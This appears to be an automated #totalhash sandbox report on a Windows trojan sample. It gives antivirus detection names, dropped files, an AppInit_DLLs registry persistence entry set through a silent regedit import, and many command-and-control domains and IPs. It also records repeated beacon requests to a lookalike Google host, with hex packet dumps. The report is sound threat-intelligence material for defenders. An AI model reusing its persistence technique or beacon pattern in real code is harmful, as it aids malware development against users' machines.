Analysis | #totalhash

Analysis Date	2014-12-03 06:52:19
MD5	20bcbec884b03dc1a690e27f20090c71
SHA1	a78d592e4f006b7ef4fe98a9787a516cbf5de22a

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 86545ce5ca75d7e4dcf363015c199283 sha1: cda6553c89dc1bc24d72b2aaa0ece4da2a40021f size: 158208
Section	.rdata md5: df525fbfab9c526fad0fbe0025155602 sha1: 318df8d4c2cf1223b4bafc97b7cdc92650f3d68b size: 7680
Section	.data md5: c09bf44b072678e62bd78e5b20489cb8 sha1: 45d8724e9c2de16e85aff4da7b6be14231d58805 size: 3584
Section	.rsrc md5: 88c88892e37f4916ac350085eba32dc9 sha1: 6f812df6a71df22d9135a47754dd2307eb9c7ecc size: 301568
Timestamp	2012-10-18 11:34:07
Packer	Microsoft Visual C++ ?.?
PEhash	a66d95d9cbdd82d1cc662d4c777e38c555ee3b19
IMPhash	2aeec6ce5d40ec8b3bd612e86cb0d990
AV	360 Safe	Gen:Variant.Symmi.7206
AV	Ad-Aware	Gen:Variant.Symmi.7206
AV	Alwil (avast)	Trojan-gen:Win32:Trojan-gen
AV	Arcabit (arcavir)	no_virus
AV	Authentium	W32/Cidox.A.gen!Eldorado
AV	Avira (antivir)	TR/Vundo.Gen7
AV	BullGuard	Gen:Variant.Symmi.7206
AV	CA (E-Trust Ino)	Win32/Vundo.N!generic
AV	CAT (quickheal)	no_virus
AV	ClamAV	no_virus
AV	Dr. Web	Trojan.Mayachok.17986
AV	Emsisoft	Gen:Variant.Symmi.7206
AV	Eset (nod32)	Win32/Citirevo.AD
AV	Fortinet	W32/Cidox.AND!tr
AV	Frisk (f-prot)	W32/Cidox.A.gen!Eldorado
AV	F-Secure	Gen:Variant.Symmi.7206
AV	Grisoft (avg)	Win32/Cryptor
AV	Ikarus	Trojan-Downloader.Win32.Vundo
AV	K7	Riskware ( 0015e4f01 )
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	Backdoor.Cidox
AV	Mcafee	no_virus
AV	Microsoft Security Essentials	TrojanDropper:Win32/Vundo.V
AV	MicroWorld (escan)	Gen:Variant.Symmi.7206
AV	Norman	Gen:Variant.Symmi.7206
AV	Rising	no_virus
AV	Sophos	no_virus
AV	Symantec	no_virus
AV	Trend Micro	no_virus
AV	VirusBlokAda (vba32)	Trojan.Cidox.51105

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates File	\Device\Afd\Endpoint
Creates File	C:\WINDOWS\system32\fjzhzyd.dll
Creates File	C:\Documents and Settings\Administrator\Cookies\cf
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process	C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS	clickbeta.ru
Winsock DNS	91.220.35.154
Winsock DNS	veroconma.com
Winsock DNS	terrans.su
Winsock DNS	getinball.com
Winsock DNS	theloamva.com
Winsock DNS	tryatdns.com
Winsock DNS	clickclans.ru
Winsock DNS	dentagod.com
Winsock DNS	denareclick.com
Winsock DNS	debijonda.com
Winsock DNS	fescheck.com
Winsock DNS	liteworns.com
Winsock DNS	getintsu.com
Winsock DNS	nshouse1.com
Winsock DNS	vengibit.com
Winsock DNS	tryangets.com
Winsock DNS	netrovad.com
Winsock DNS	vornedix.com
Winsock DNS	inzavora.com
Winsock DNS	getavodes.com
Winsock DNS	clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\fjzhzyd.dll\\x00

Network Details:

DNS	debijonda.com Type: A 141.8.225.80
DNS	veroconma.com Type: A 74.117.179.241
DNS	theloamva.com Type: A 141.8.225.80
DNS	vornedix.com Type: A 141.8.225.80
DNS	dentagod.com Type: A 141.8.225.80
DNS	liteworns.com Type: A 141.8.225.80
DNS	vengibit.com Type: A 141.8.225.80
DNS	tryangets.com Type: A 141.8.225.80
DNS	getintsu.com Type: A 141.8.225.80
DNS	getavodes.com Type: A 209.222.14.3
DNS	tryatdns.com Type: A 209.222.14.3
DNS	fescheck.com Type: A 109.234.109.76
DNS	inzavora.com Type: A 141.8.225.80
DNS	getinball.com Type: A
DNS	netrovad.com Type: A
DNS	terrans.su Type: A
DNS	clickstano.com Type: A
DNS	denareclick.com Type: A
DNS	clickbeta.ru Type: A
DNS	nshouse1.com Type: A
DNS	clickclans.ru Type: A
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XUhlcslvKJU User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2QoBwbtW5V8r User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2QoBwbtW5V8r User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2VBgbPIZgIMO User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2VBgbPIZgIMO User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2asP3ogWtnv2 User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2fyn/8nh8aWO User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2Q3hsPJwjDWJ User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2dtfNJWfOUgU User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2ZxPWycrlyn2 User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1032 ➝ 74.117.179.241:80
Flows TCP	192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1040 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1041 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1042 ➝ 109.234.109.76:80
Flows TCP	192.168.1.1:1043 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1044 ➝ 91.220.35.154:80

Raw Pcap

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 55686c63 736c764b 4a552048   MT2XUhlcslvKJU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543251 6f427762 74573556 38722048   MT2QoBwbtW5V8r H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543251 6f427762 74573556 38722048   MT2QoBwbtW5V8r H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543256 42676250 495a6749 4d4f2048   MT2VBgbPIZgIMO H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543256 42676250 495a6749 4d4f2048   MT2VBgbPIZgIMO H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543261 7350336f 6757746e 76322048   MT2asP3ogWtnv2 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543266 796e2f38 6e683861 574f2048   MT2fyn/8nh8aWO H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543251 33687350 4a776a44 574a2048   MT2Q3hsPJwjDWJ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543264 74664e4a 57664f55 67552048   MT2dtfNJWfOUgU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
